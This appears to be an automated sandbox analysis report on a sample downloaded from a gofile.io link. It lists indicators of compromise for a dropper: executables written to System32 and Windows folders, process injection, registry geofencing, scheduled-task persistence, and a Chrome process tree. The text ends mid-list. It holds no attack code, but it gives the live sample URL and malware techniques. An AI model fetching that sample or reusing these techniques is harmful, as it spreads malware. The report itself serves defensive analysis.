hxxps://gofile[.]io/d/2DDghj

Resubmissions

15/04/2023, 06:29

230415-g89aladc88 1

14/04/2023, 01:53

230414-ca7xnagh7v 10

Analysis

max time kernel
213s
max time network
221s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
14/04/2023, 01:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/2DDghj

Score

10^/10

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 2332 created 616	2332	Tor_server.bat.exe	3
PID 5168 created 616	5168	$sxr-powershell.exe	3

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation	Tor_server.bat.exe

Executes dropped EXE 7 IoCs

pid	Process
2332	Tor_server.bat.exe
4144	Tor_server.bat.exe
5168	$sxr-powershell.exe
2220	$sxr-powershell.exe
5460	$sxr-powershell.exe
6900	$sxr-powershell.exe
6488	$sxr-powershell.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\ucrtbased.dll	Tor_server.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	Tor_server.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	Tor_server.bat.exe
File created	C:\Windows\System32\ucrtbased.dll	Tor_server.bat.exe
File created	C:\Windows\System32\vcruntime140_1d.dll	Tor_server.bat.exe
File created	C:\Windows\System32\vcruntime140d.dll	Tor_server.bat.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2332 set thread context of 6548	2332	Tor_server.bat.exe	152
PID 5168 set thread context of 4324	5168	$sxr-powershell.exe	154

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\$sxr-powershell.exe	Tor_server.bat.exe
File opened for modification	C:\Windows\$sxr-powershell.exe	Tor_server.bat.exe
File created	C:\Windows\$sxr-seroxen1\$sxr-nircmd.exe	Tor_server.bat.exe
File created	C:\Windows\$sxr-seroxen1\$sxr-Uni.bat	Tor_server.bat.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133259180503440120"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
3300	chrome.exe
3300	chrome.exe
7032	chrome.exe
7032	chrome.exe
2332	Tor_server.bat.exe
2332	Tor_server.bat.exe
2332	Tor_server.bat.exe
4144	Tor_server.bat.exe
4144	Tor_server.bat.exe
4144	Tor_server.bat.exe
2332	Tor_server.bat.exe
6548	dllhost.exe
6548	dllhost.exe
6548	dllhost.exe
6548	dllhost.exe
2332	Tor_server.bat.exe
2332	Tor_server.bat.exe
5168	$sxr-powershell.exe
5168	$sxr-powershell.exe
5168	$sxr-powershell.exe
5168	$sxr-powershell.exe
4324	dllhost.exe
4324	dllhost.exe
4324	dllhost.exe
4324	dllhost.exe
5168	$sxr-powershell.exe
5168	$sxr-powershell.exe
2220	$sxr-powershell.exe
2220	$sxr-powershell.exe
2220	$sxr-powershell.exe
2220	$sxr-powershell.exe
2220	$sxr-powershell.exe
5460	$sxr-powershell.exe
5460	$sxr-powershell.exe
5460	$sxr-powershell.exe
5460	$sxr-powershell.exe
5460	$sxr-powershell.exe
6900	$sxr-powershell.exe
6900	$sxr-powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 41 IoCs

pid	Process
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe
Token: SeShutdownPrivilege	3300	chrome.exe
Token: SeCreatePagefilePrivilege	3300	chrome.exe

Suspicious use of FindShellTrayWindow 36 IoCs

pid	Process
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe
3300	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3300 wrote to memory of 4348	3300	chrome.exe	84
PID 3300 wrote to memory of 4348	3300	chrome.exe	84
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 3184	3300	chrome.exe	85
PID 3300 wrote to memory of 464	3300	chrome.exe	86
PID 3300 wrote to memory of 464	3300	chrome.exe	86
PID 3300 wrote to memory of 540	3300	chrome.exe	87
PID 3300 wrote to memory of 540	3300	chrome.exe	87
PID 3300 wrote to memory of 540	3300	chrome.exe	87
PID 3300 wrote to memory of 540	3300	chrome.exe	87
PID 3300 wrote to memory of 540	3300	chrome.exe	87
PID 3300 wrote to memory of 540	3300	chrome.exe	87
PID 3300 wrote to memory of 540	3300	chrome.exe	87
PID 3300 wrote to memory of 540	3300	chrome.exe	87
PID 3300 wrote to memory of 540	3300	chrome.exe	87
PID 3300 wrote to memory of 540	3300	chrome.exe	87
PID 3300 wrote to memory of 540	3300	chrome.exe	87
PID 3300 wrote to memory of 540	3300	chrome.exe	87
PID 3300 wrote to memory of 540	3300	chrome.exe	87
PID 3300 wrote to memory of 540	3300	chrome.exe	87
PID 3300 wrote to memory of 540	3300	chrome.exe	87
PID 3300 wrote to memory of 540	3300	chrome.exe	87
PID 3300 wrote to memory of 540	3300	chrome.exe	87
PID 3300 wrote to memory of 540	3300	chrome.exe	87
PID 3300 wrote to memory of 540	3300	chrome.exe	87
PID 3300 wrote to memory of 540	3300	chrome.exe	87
PID 3300 wrote to memory of 540	3300	chrome.exe	87
PID 3300 wrote to memory of 540	3300	chrome.exe	87

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{f2283ee6-8a1f-421b-a8bd-ccfa0af98f5a}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6548
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{7cacc068-c528-4123-aec3-d6f0c2e8f12a}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4324
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{78dbc1e0-a5cb-41db-b4aa-cb01ac01aac3}
  2⤵
  PID:2540

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" https://gofile.io/d/2DDghj
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbc1179758,0x7ffbc1179768,0x7ffbc1179778
  2⤵
  PID:4348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1724 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:2
  2⤵
  PID:3184
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:8
  2⤵
  PID:464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2156 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:8
  2⤵
  PID:540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3148 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:1544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3168 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:4888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4544 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:1892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3164 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5132 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:1284
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4824 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:2568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5648 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:820
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5788 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:2784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=6008 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:3740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=6004 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:1416
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=6672 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:1176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=6540 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:2652
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=6944 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:2152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5752 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:2224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=6408 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:2752
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=7312 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:3052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=7224 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:4560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=7472 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:3044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=7760 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:4780
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=7956 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:5128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=8112 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:5220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=8272 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:5272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=5208 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:5420
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=7336 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:5508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=8668 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:5588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=8872 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:5668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=8984 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:5684
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=8988 --field-trial-handle=1808,i,12851220694848150192,17724915782079282363,131072 /prefetch:1
  2⤵
  PID:5812
- C:\Program Files\Google\Chrome\Application\chrome.exe
